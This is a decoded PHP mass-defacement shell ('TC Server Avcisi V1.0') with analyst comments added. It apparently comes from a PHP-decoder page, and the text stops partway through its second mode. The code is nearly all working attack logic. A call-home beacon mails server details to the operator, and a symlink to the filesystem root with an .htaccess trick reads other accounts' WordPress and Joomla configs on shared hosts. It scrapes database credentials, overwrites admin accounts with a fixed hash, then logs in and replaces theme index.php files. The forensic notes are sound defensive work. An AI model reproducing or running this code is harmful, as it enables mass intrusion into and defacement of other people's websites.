
PHP Decode

<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\..

Decoded Output download

?><?php

// Analyst note: call-home beacon. This runs at top level, before any form or
// parameter check, so every request to the script sends one e-mail.
// The recipient address below is masked by the hosting page ("[email protected]"),
// so the operator's mailbox cannot be recovered from this copy.
$kime="[email protected]";
// Fixed subject line; usable as a mail-log / outbound-filter indicator.
$baslik="TC Server Avcisi V1.0";
// Body (Turkish labels): "Dosya Yolu" = file path (document root),
// "Server Admin", "Server isletim sistemi" = server software string,
// "Shell Link" = URL of this script rebuilt from SERVER_NAME + PHP_SELF,
// "Avlanan Site" = the Host header of the request.
$H4CK4L="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."
";
$H4CK4L.="Server Admin : ".$_SERVER['SERVER_ADMIN']."
";
$H4CK4L.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."
";
$H4CK4L.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."
";
$H4CK4L.="Avlanan Site : " .$_SERVER['HTTP_HOST']."
";
// Sent through the local MTA via PHP mail(); the return value is not checked.
mail($kime, $baslik, $H4CK4L);

// Suppresses all PHP error output for the rest of the request, so failures in
// the functions below leave no warnings in the response.
error_reporting(0);
/**
 * Returns the trimmed text found between two literal markers.
 *
 * The input is split on $marqueurDebutLien; piece number $i (default 1, i.e.
 * the text after the first occurrence) is then split on $marqueurFinLien and
 * the part before that end marker is returned.
 *
 * In this file it is used as a crude scraper: it pulls database settings out
 * of CMS configuration file text and hidden form fields out of admin HTML.
 * No check is made that either marker exists; with error_reporting(0) set at
 * the top of the script a missing marker produces no visible warning.
 *
 * @param string $text               Text to search.
 * @param string $marqueurDebutLien  Literal start marker.
 * @param string $marqueurFinLien    Literal end marker.
 * @param int    $i                  Which piece after splitting on the start marker to use.
 * @return string Trimmed text between the markers.
 */
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    $ar0=explode($marqueurDebutLien, $text);
    $ar1=explode($marqueurFinLien, $ar0[$i]);
    return trim($ar1[0]);
}

/**
 * Builds an 8-character string of lowercase letters and digits.
 *
 * The only caller visible in this file is index_changer_joomla(), which uses
 * the result as the file name of its curl cookie jar. For triage this means a
 * short-lived 8-character extensionless file may appear in the script's
 * working directory while the Joomla routine runs.
 *
 * The generator is seeded from microtime() and uses rand(), so the value is
 * not cryptographically random.
 *
 * @return string 8 characters drawn from $chars.
 */
function randomt() {
    $chars = "abcdefghijkmnopqrstuvwxyz023456789";
    srand((double)microtime()*1000000);
    $i = 0;
    $pass = '';
    // Loop runs for $i = 0..7, i.e. eight characters.
    while ($i <= 7) {
        $num = rand() % 33;
        $tmp = substr($chars, $num, 1);
        $pass = $pass . $tmp;
        $i++;
    }
    return $pass;
}

/**
 * WordPress takeover routine (analyst annotation; code left unchanged).
 *
 * Observable behaviour, in order:
 *   1. Scrapes DB_USER / DB_PASSWORD / DB_NAME / DB_HOST and $table_prefix out
 *      of the wp-config.php text passed in $conf.
 *   2. Connects to that database and overwrites the account with ID = 1:
 *      user_login becomes 'admin' and user_pass becomes the fixed hash
 *      e643c1c13d227f84703cec754be756d2.
 *   3. Reads the 'home', 'template' and 'current_theme' options.
 *   4. Logs in through wp-login.php with curl and a fixed user-agent string.
 *   5. Opens the theme's index.php in wp-admin/theme-editor.php and posts
 *      replacement content.
 *   6. Deletes the cookie jar file.
 *
 * Forensic indicators that follow directly from the code: the users-table row
 * with ID 1 carrying the hash above, a transient COOKIE.txt in the working
 * directory, the MSIE 7.0b / "Alexa Toolbar" user-agent in access logs on
 * wp-login.php and theme-editor.php, and a modified theme index.php.
 *
 * NOTE(review): the DB step uses the legacy mysql_* extension; it presumably
 * only works on PHP builds that still ship it - confirm against the host.
 * NOTE(review): step 5 depends on the built-in theme editor being enabled;
 * WordPress's DISALLOW_FILE_EDIT setting is the usual hardening for that.
 *
 * @param string $conf     Text of a wp-config.php file.
 * @param string $content  Base64 text; it is base64-decoded before being posted as the new file body.
 * @return array ['cond' => success flag, 'output' => HTML status log]
 */
function index_changer_wp($conf, $content) {
    $output = '';
    $dol = '$';
    $go = 0;
    // Credential scraping: plain substring extraction from the config text.
    $username = entre2v2($conf,"define('DB_USER', '","');");
    $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
    $dbname = entre2v2($conf,"define('DB_NAME', '","');");
    $prefix = entre2v2($conf,$dol."table_prefix  = '","'");
    $host = entre2v2($conf,"define('DB_HOST', '","');");

    $link=mysql_connect($host,$username,$password);
    if($link) {
        mysql_select_db($dbname,$link) ;
        $dol = '$';
        // Account hijack: the row with ID 1 is renamed to 'admin' and given a
        // hard-coded password hash. The previous login name and hash are lost.
        $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = 'e643c1c13d227f84703cec754be756d2' WHERE `ID` = 1");
    } else {
        // "DB Hata" = database error.
        $output.= "[-] DB Hata :(<br />";
    }
    if($req1) {

        // Site URL and active theme are read from the options table.
        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
        $data = mysql_fetch_array($req);
        $site_url=$data["option_value"]; 

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='template'");
        $data = mysql_fetch_array($req);
        $template = $data["option_value"];

        $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='current_theme'");
        $data = mysql_fetch_array($req);
        $current_theme = $data["option_value"];

        // Fixed user-agent used for every request in this routine.
        $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
        $url2=$site_url."/wp-login.php";

        // Login request with the credentials matching the hash written above.
        // Cookies are kept in a file named COOKIE.txt (relative path).
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url2);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
        curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
        $buffer = curl_exec($ch);

        // Login is judged successful when the response contains a logout link.
        $pos = strpos($buffer,"action=logout");
        if($pos === false) {
// "Giris Basarisiz" = login failed.
$output.= "[-] Giri Basarisiz<br />";
        } else {
// "Giris Basarili" = login succeeded.
$output.= "[+] Giri Basarili :)<br />";
$go = 1;
        }
        if($go) {
$cond = 0;
// First attempt: theme editor URL form that passes file, theme and dir.
$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);

// The anti-CSRF nonce and the file field are scraped from the editor form.
$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(substr_count($_file,"/index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
// File overwrite: the decoded $content replaces the theme's index.php.
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);

// Success is inferred from the editor's "updated" message block.
$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
$output.= "[-] updating index.php Error<br />";
} else {
$output.= "[+] index.php Updated Successfuly<br />";
$hk = explode('public_html',$_file);
// The modified page is fetched back over HTTP and appended to the status log.
$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
$cond = 1;
}
} else {
// Fallback: a second theme editor URL form (file=index.php&theme=<template>).
$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);

$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(substr_count($_file,"index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
// Same overwrite as above, with the extra theme field this form expects.
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
    // "Hata" = error.
    $output.= "[-] index.php Hata !<br />";
} else {
    // "Yuklendi" = uploaded.
    $output.= "[+] index.php Yklendi. :)<br />";
    $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
    $cond = 1;
}
} else {
// "Temaya Yuklenemiyor" = cannot be loaded into the theme.
$output.= "[-] index.php Temaya Yuklenemiyor<br />";
}
}
        }
    } else {
        $output.= "[-] DB Hata :(<br />";
    }
    // Cleanup: removes the cookie jar. $base_path is a global that is not
    // defined anywhere in the visible part of the file.
    global $base_path;
    unlink($base_path.'COOKIE.txt');
    return array('cond'=>$cond, 'output'=>$output);
}

/**
 * Joomla takeover routine (analyst annotation; code left unchanged).
 *
 * Observable behaviour, in order:
 *   1. Scrapes $user / $password / $db / $dbprefix / $host out of the
 *      configuration.php text passed in $conf.
 *   2. Connects to that database and runs an UPDATE on the users table with
 *      no WHERE clause: every row gets username 'admin', the fixed hash
 *      e643c1c13d227f84703cec754be756d2, usertype 'Super Administrator' and
 *      block = 0.
 *   3. Checks whether an "<prefix>extensions" table exists and picks one of
 *      two code paths from that (the two paths use different table names,
 *      admin URLs and form fields - presumably two Joomla generations).
 *   4. Logs in to /administrator with curl, opens the active template's
 *      index.php in the template source editor, and posts $content over it.
 *   5. Deletes the cookie jar file.
 *
 * Forensic indicators that follow directly from the code: all rows of the
 * users table sharing the same username and hash, requests to
 * /administrator/index.php with option=com_templates and task=source.save or
 * task=save_source, and a transient 8-character cookie file from randomt().
 *
 * NOTE(review): the DB step uses the legacy mysql_* extension; it presumably
 * only works on PHP builds that still ship it - confirm against the host.
 *
 * @param string $conf     Text of a Joomla configuration.php file.
 * @param string $content  Replacement file body, posted as given by the caller.
 * @param string $domain   Host name used to build http://<domain>/administrator.
 * @return array ['cond' => success flag, 'output' => HTML status log]
 */
function index_changer_joomla($conf, $content, $domain) {
    $doler = '$';
    // Credential scraping: plain substring extraction from the config text.
    $username = entre2v2($conf, $doler."user = '", "';");
    $password = entre2v2($conf, $doler."password = '", "';");
    $dbname = entre2v2($conf, $doler."db = '", "';");
    $prefix = entre2v2($conf, $doler."dbprefix = '", "';");
    $host = entre2v2($conf, $doler."host = '","';");
    // Random 8-character name for the curl cookie jar.
    $co=randomt();
    $site_url = "http://".$domain."/administrator";
    $output = '';
    $cond = 0; 
    $link=mysql_connect($host, $username, $password);
    if($link) {
        mysql_select_db($dbname,$link) ;
        // Account hijack: no WHERE clause, so every user row is overwritten.
        $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = 'e643c1c13d227f84703cec754be756d2', `usertype` = 'Super Administrator', `block` = 0");
        // Row count of SHOW TABLES decides which of the two branches below runs.
        $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
    } else {
        // "DB Hata" = database error.
        $output.= "[-] DB Hata :(<br />";
    }
    
    if($req1){
        if ($req) {
// Branch A: an extensions table exists. The default site template is read
// from template_styles and resolved to an extension_id.
$req = mysql_query("SELECT * from  `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];

$req = mysql_query("SELECT * from  `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
$data = mysql_fetch_array($req);
$template_id = $data["extension_id"];

// Fetch the admin login page to scrape its hidden "return" and token fields.
// Note: $useragent is not assigned anywhere in this branch before use.
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);

if($return && $hidden) {
// Login POST with the credentials matching the hash written above.
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_REFERER, $url2);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=tolizuga&option=com_login&task=login&return=".$return."&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
// Login is judged successful when the response mentions com_config.
$pos = strpos($buffer,"com_config");
if($pos === false) {
// "Giris Basarisiz" = login failed.
$output.= "[-] Giris Basarisiz<br />";
} else {
// "Giris Basarili" = login succeeded.
$output.= "[+] Giris Basarili :)<br />";
}
}
if($pos){
// Open the template's index.php in the source editor to scrape a form token.
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);

$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
if($hidden2) {
// "Bulundu" = found.
$output.= "[+] index.php Bulundu Reis.<br />";
} else {
// "Bulunamadi" = not found.
$output.= "[-] index.php Bulunamadi Reis.<br />";
}
}
if($hidden2) {
// File overwrite: $content is saved as the template's index.php.
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
curl_close($ch);

// Success is inferred from the admin UI's message block.
$pos = strpos($buffer,'<dd class="message message">');
$cond = 0;
if($pos === false) {
$output.= "[-] index.php Hata A.Q :(<br />";
   
} else {
// "Kayit Edildi" = saved.
$output.= "[+] index.php Kayit Edildi Hadi yisiN.<br />";
$cond = 1;
}
}
        } 
        else {
// Branch B: no extensions table. The template name comes from templates_menu
// and the older edit_source / save_source tasks are used.
$req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
// Same fixed user-agent string as the WordPress routine.
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);

if($hidden) {
// Login POST; note the password literal differs from branch A.
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Giris Baarisiz.<br />";
} else {
$output.= "[+] Giris Basarili !<br />";
}
}

if($pos) {
// Open the template source editor to scrape a form token.
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
// The "[+]" message text here reads "not found" although it is emitted when
// the token WAS found; treat the status log wording as unreliable.
if($hidden2) {
$output.= "[+] index.php Bulunamadi A.Q :(<br />";
} else {
$output.= "[-] index.php Tema ditr Bulunamad<br />";
}
}

if($hidden2) {
// File overwrite: $content is saved as the template source.
$url2=$site_url."/index.php?option=com_templates&layout=edit";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);
curl_close($ch);

$pos = strpos($buffer,'<dd class="message message fade">');
$cond = 0;
if($pos === false) {
$output.= "[-] index.php Sablonu Ailamadi !<br />";
} else {
$output.= "[+] index.php Sablonu Basar ile Kayt Edildi<br />";
$cond = 1;
}
}
        }
    } else {
        $output.= "[-] DB Hata A.Q :(<br />";
    }
    // Cleanup: removes the cookie jar. $base_path is a global that is not
    // defined anywhere in the visible part of the file.
    global $base_path;
    unlink($base_path.$co);
    return array('cond'=>$cond, 'output'=>$output); 
}

/**
 * Mode 1 driver: symlink-based config harvesting on a shared host
 * (analyst annotation; code left unchanged).
 *
 * What the code does:
 *   - Creates a world-writable "sym" directory next to the script, writes an
 *     .htaccess into it that maps .php and .html to text/plain, and creates
 *     the symlink sym/root -> "/".
 *   - Reads /etc/named.conf and extracts every zone name as a domain.
 *   - For each domain, takes the owner of /etc/valiases/<domain> as the
 *     hosting account name.
 *   - Requests, over HTTP through its own sym/root/home/<account>/public_html/
 *     path, the files configuration.php, wp-config.php and blog/wp-config.php,
 *     and hands any hit to index_changer_joomla() / index_changer_wp().
 *   - Appends each successfully modified domain to defaced.html and prints an
 *     HTML result table.
 *
 * Filesystem artefacts for triage: sym/, sym/.htaccess, sym/root, defaced.html.
 *
 * NOTE(review): the technique relies on the web server following a symlink
 * out of the account's docroot and on per-directory .htaccess overrides being
 * honoured. Apache's SymLinksIfOwnerMatch option, a restrictive AllowOverride,
 * and non-world-readable CMS config files are the usual controls - confirm
 * which apply on the affected host.
 *
 * @param string $def_url  URL whose body is fetched and used as replacement page content.
 * @param mixed  $hacker   Not used inside this function.
 * @return void  Output is echoed directly.
 */
function exec_mode_1($def_url, $hacker) {

    @mkdir('sym',0777);
    // .htaccess body: serve PHP/HTML as plain text so config files reached via
    // the symlink are returned as source instead of being executed.
    $wr  = "Options all 
 DirectoryIndex Sux.html 
 AddType text/plain .php 
 AddHandler server-parsed .php 
  AddType text/plain .html 
 AddHandler txt .html 
 Require None 
 Satisfy Any";
    $fp = @fopen ('sym/.htaccess','w');
    fwrite($fp, $wr);
    // Symlink to the filesystem root, exposed under the web-served directory.
    @symlink('/','sym/root');
    // Domain enumeration from the DNS server configuration.
    $dominios = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
    $out[1] = array_unique($out[1]);
    $numero_dominios = count($out[1]);
    // "Toplam Domain" = total domains.
    echo "Toplam Domain: $numero_dominios <br><br />";
    // Replacement page content is pulled from an operator-supplied URL.
    $def = file_get_contents($def_url);
    $def = urlencode($def);
    $dd = 'ToLiZuGa';
    $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
    // Running list of affected domains, appended across runs.
    $output = fopen('defaced.html', 'a+');
    // Session counters are kept when a start offset (?st=) is supplied, reset otherwise.
    $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
    $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>
    ';
    $j = 1;
    $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
    for($i = $st; $i <= $numero_dominios; $i++)
    {
        $domain = $out[1][$i];
        // Account name is derived from the owner of the domain's valiases file.
        $dono_arquivo = @fileowner("/etc/valiases/".$domain);
        $infos = @posix_getpwuid($dono_arquivo);
        
        if($infos['name']!='root') {
// Config files of other accounts are read through the sym/root symlink.
$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");

$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
// Joomla is recognised by "dbprefix" appearing in configuration.php.
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count1'] = $_SESSION['count1'] + 1;
} else {
echo '<td align="center"><span class="red">Basarsz</span></td>';
}
echo '</tr>';
}

// WordPress is recognised by "DB_NAME" appearing in wp-config.php.
if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $dd);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo '<td align="center"><span class="red">Basarsz</span></td>';
}
echo '</tr>';
}
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
// Same check for a WordPress install under /blog.
if($config03 && preg_match('/DB_NAME/i',$config03)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config03, $dd);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED A.Q</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {    
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
        }
    }
    echo '</table>
    ';
    echo '<hr/>';
    // Summary line and link to the accumulated defaced.html list.
    echo 'Toplam Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
    echo '<a href="defaced.html" target="_blank">Deface Edilen Siteler A.Q. ( Tikla )</a><br />';
    if($_SESSION['count1']+$_SESSION['count2'] > 0){
        // Link back to this script with zh=1; the handler for that parameter is
        // not in the visible part of the file.
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
/**
 * Mode 2 driver: CGI-helper-based config harvesting
 * (analyst annotation; code left unchanged).
 *
 * What the code does:
 *   - Reads /etc/named.conf for zone names and maps each hosting account name
 *     (owner of /etc/valiases/<domain>) to its domain.
 *   - Creates a world-writable "plsym" directory, drops a helper file
 *     plsym/plsym.cc (mode 0755) and an .htaccess that enables ExecCGI and
 *     registers .cc as a CGI script.
 *   - Triggers the helper once by requesting its own URL, then deletes it.
 *   - Reads the directory listing of plsym/ over HTTP and treats entries named
 *     "<account>##joomla.txt" / "<account>##wordpress.txt" as harvested config
 *     files, which are passed to index_changer_joomla() / index_changer_wp().
 *   - Appends each successfully modified domain to defaced.html.
 *
 * NOTE(review): in this decoded copy $dt holds only a short literal, so the
 * helper's actual content is not present on the page; its behaviour is
 * inferred solely from the file names parsed afterwards.
 *
 * Filesystem artefacts for triage: plsym/, plsym/.htaccess, files matching
 * "*##joomla.txt" or "*##wordpress.txt", defaced.html.
 *
 * NOTE(review): the technique needs .htaccess to be allowed to turn on CGI
 * execution and directory indexes; a restrictive AllowOverride setting is the
 * usual control - confirm on the affected host.
 *
 * @param string $def_url  URL whose body is fetched and used as replacement page content.
 * @return void  Output is echoed directly.
 */
function exec_mode_2($def_url) {
    
    // Domain enumeration from the DNS server configuration.
    $domains = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
    $out = array_unique($out[1]);
    $num = count($out);
    // "Toplam Domain" = total domains.
    print("Toplam Domain: $num<br><br />");
    
    // Replacement page content is pulled from an operator-supplied URL.
    $def = file_get_contents($def_url);
    $def = urlencode($def);
       
